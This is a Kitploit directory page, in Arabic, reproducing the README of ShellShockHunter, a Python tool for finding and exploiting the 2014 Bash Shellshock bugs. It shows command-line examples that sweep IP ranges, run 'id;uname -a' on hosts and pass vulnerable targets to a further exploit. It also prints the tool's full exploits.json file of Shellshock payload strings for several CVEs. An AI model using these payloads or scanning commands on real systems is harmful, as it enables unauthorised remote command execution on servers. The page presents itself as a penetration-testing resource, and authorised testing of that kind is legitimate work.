Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ShellShockHunter — إنها أداة بسيطة لاختبار ثغرة shellshock | Kitploit
أدوات/GitHubGitHub/mrcl0wnlab/shellshockhunter
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmrcl0wnlab/shellshockhunter

ShellShockHunter

إنها أداة بسيطة لاختبار ثغرة shellshock

عرض المستودع
12434منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بانر ShellShockHunter v1.0

ShellShockHunter v1.0

أداة بسيطة لاختبار ثغرة Shellshock

رخصة GPL حجم كود المصدر بالبايت بايثون 3.8 نظام التشغيل المدعوم لينكس برتقالي نظام التشغيل المدعوم ماك برتقالي

root@kitploit:~
Autor:    MrCl0wn
Blog:     http://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com

Shellshock (خلل برمجي)

Shellshock، والمعروف أيضًا باسم Bashdoor، هو مجموعة من الثغرات الأمنية في شل Bash لنظام Unix، تم الكشف عن أولها في 24 سبتمبر 2014. يمكن لـ Shellshock تمكين المهاجم من جعل Bash ينفذ أوامر عشوائية والحصول على وصول غير مصرح به إلى العديد من الخدمات الموجهة للإنترنت، مثل خوادم الويب، التي تستخدم Bash لمعالجة الطلبات.

إخلاء مسؤولية

هذا البرنامج أو البرامج السابقة مخصصة للأغراض التعليمية فقط. لا تستخدمها بدون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة أنني (MrCl0wnLab) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذه البرامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس من مسؤولية MrCl0wnLab.

التثبيت

استخدم مدير الحزم pip

Pip

root@kitploit:~
pip install shodan
pip install ipinfo

المساعدة

root@kitploit:~
python main.py --help

                        
                                          ,/
                                        ,'/
                                      ,' /
                                    ,'  /_____,
                                  .'____    ,'    
                                        /  ,'
                                      / ,'
                                      /,'
                                    /'
             ____  _     _____ _     _     ____  _      ___       _    
            / ___|| |__ |___ /| |   | |   / ___|| |__  / _ \  ___| | __
            \___ \| '_ \  |_ \| |   | |   \___ \| '_ \| | | |/ __| |/ /
             ___) | | | |___) | |___| |___ ___) | | | | |_| | (__|   < 
            |____/|_| |_|____/|_____|_____|____/|_| |_|\___/ \___|_|\_\
                     __   _   _             _              __                  
                    | _| | | | |_   _ _ __ | |_ ___ _ __  |_ |                 
                    | |  | |_| | | | | '_ \| __/ _ \ '__|  | |                 
                    | |  |  _  | |_| | | | | ||  __/ |     | |                 
                    | |  |_| |_|\__,_|_| |_|\__\___|_|     | |                 
                    |__|                                  |__| v1.0                
                      من إعداد: MrCl0wn / https://blog.mrcl0wn.com                                                                          
         
الاستخدام: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] 
[--cmd-cgi <أمر شل>] [--exec-vuln <أمر شل>] [--thread <20>] 
[--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]

الوسائط الاختيارية:
  -h, --help                   عرض رسالة المساعدة هذه والخروج
  --file <ips.txt>             إدخال قائمة الأهداف
  --range <ip-start>,<ip-end>  تعيين نطاق IP مثال: 192.168.15.1,192.168.15.100
  --cmd-cgi <أمر شل>           تحديد أمر شل الذي سيتم تنفيذه في الحمولة
  --exec-vuln <أمر شل>         تنفيذ الأوامر على الأهداف الضعيفة
  --thread <20>, -t <20>       مثال 20
  --check                      التحقق من ثغرة Shellshock
  --ssl                        تمكين الطلب باستخدام SSL
  --cgi-file <cgi.txt>         تحديد ملف CGI لاستخدامه
  --timeout <5>                تعيين مهلة الاتصال
  --all                        اختبار جميع الحمولات
  --debug, -d                  تمكين وضع التصحيح

مثال على الأوامر:

root@kitploit:~
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"' --debug

لقطات:

البداية

Logo

المعالجة

Logo

الأمر الخاص ( --exec-vuln 'echo "_TARGET_"' )

Logo

الأمر ( --debug )

Logo --debug

ملف المصدر (التجارب)

المسار: assets/exploits.json

root@kitploit:~
{
    "DEFAULT":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271": 
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271-2":
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
    "CVE-2014-6271-3":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
    "CVE-2014-7169":
        "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
    "CVE-2014-7186":
        "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",
    "CVE-2014-7187":
        "(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
    "CVE-2014-6278":
        "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
    "CVE-2014-6278-2":    
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
    "CVE-2014-6277":
        "() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",
    "CVE-2014-*":
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}

ملف المصدر (الإعدادات)

المسار: assets/config.json

root@kitploit:~
{
    "config": {
        "threads": 20,
        "path": {
            "path_output": "output/",
            "path_wordlist": "wordlist/",
            "path_modules": "modules/",
            "path_assets": "assets/"
        },
        "files_assets":{
            "config": "assets/config.json",
            "autor": "assets/autor.json",
            "exploits": "assets/exploits.json"
        },
        "api":{
            "shodan":"",
            "ipinfo":""
        }
    }
}

شجرة الملفات

root@kitploit:~
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print00.png
│       ├── print01.png
│       ├── print02.png
│       └── print03.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_shock.py
│   ├── color_shock.py
│   ├── debug_shock.py
│   ├── file_shock.py
│   ├── __init__.py
│   ├── request_shock.py
│   ├── shodan_shock.py
│   └── thread_shock.py
├── output
│   └── vuln.txt
├── README.md
└── wordlist
    └── cgi.txt

المراجع

  • https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
  • https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
  • https://blog.inurl.com.br/search?q=shellshock
  • https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php
  • https://github.com/chelseakomlo/shellshock_demo
  • https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh
  • https://github.com/capture0x/XSHOCK/blob/master/main.py
  • https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
  • https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt
  • https://github.com/gajos112/OSCP/blob/master/Shellshock.txt
  • https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt
  • http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt
  • https://github.com/opsxcq/exploit-CVE-2014-6271
  • https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

خارطة الطريق

بدأت هذا المشروع لدراسة المزيد من بايثون والتفاعل أكثر مع واجهات برمجة التطبيقات مثل shodan و ipinfo.

  • هيكل سطر الأوامر
  • البانر
  • فئة إدارة الملفات
  • فئة إدارة طلبات HTTP
  • فئة إدارة الخيوط (Threads)
  • ملف مصدر للتجارب
  • الألوان أثناء المعالجة
  • تنفيذ الأوامر على الأهداف الضعيفة
  • تصحيح الأخطاء أثناء المعالجة
تنزيل الأداة
  • https://manualdousuario.net/shellshock-bash-falha/
  • https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit